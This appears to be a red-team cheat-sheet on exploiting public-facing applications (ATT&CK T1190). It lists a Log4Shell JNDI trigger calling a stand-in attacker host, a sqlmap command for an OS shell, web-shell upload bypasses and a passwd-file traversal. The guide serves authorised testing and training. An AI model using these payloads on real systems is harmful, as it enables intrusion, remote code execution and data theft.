Exploit Public-Facing Application (T1190)

The Internet-facing perimeter is the castle wall. One crack (unpatched software) lets the army in.

1. Known Vulnerabilities (N-Days)

Red Teams rarely drop 0-days. We use "1-days" or "N-days"—bugs patched last month that the client hasn't applied yet.

A. Log4Shell (CVE-2021-44228)

The gift that keeps on giving. Java Logging library executes code via JNDI.

• Trigger: ${jndi:ldap://attacker.com/exploit}
• Injection Points: User-Agent, Search bars, Login forms.

B. Microsoft Exchange (ProxyShell / ProxyNotShell)

Chaining path traversal + SSRF to write shells.

• Impact: Pre-Auth RCE as SYSTEM on the Exchange Server.

2. Web Application Attacks

Custom code flaws.

SQL Injection (SQLi)

Extracting data or getting a shell via xp_cmdshell. Manual Test: id=1' -> Syntax Error. Tools: SQLMap.

sqlmap -u "http://target.com/item?id=1" --os-shell

File Upload

Uploading a Web Shell (see Resource Development).

• Bypass: Rename shell.php to shell.php.jpg or shell.phtml.

3. IoT and VPN Appliances

Fortinet, Pulse Secure, Citrix usually run old firmware.

• Check: Shodan hash of the favicon can confirm the specific version.
• Exploit: Usually Directory Traversal (../../etc/passwd) to leak session cookies.

OpSec

• Exploits are Noisy: They often crash services.
• Scanning: Don't run nuclei against the main production server at 100 threads. Use Scan-Delay.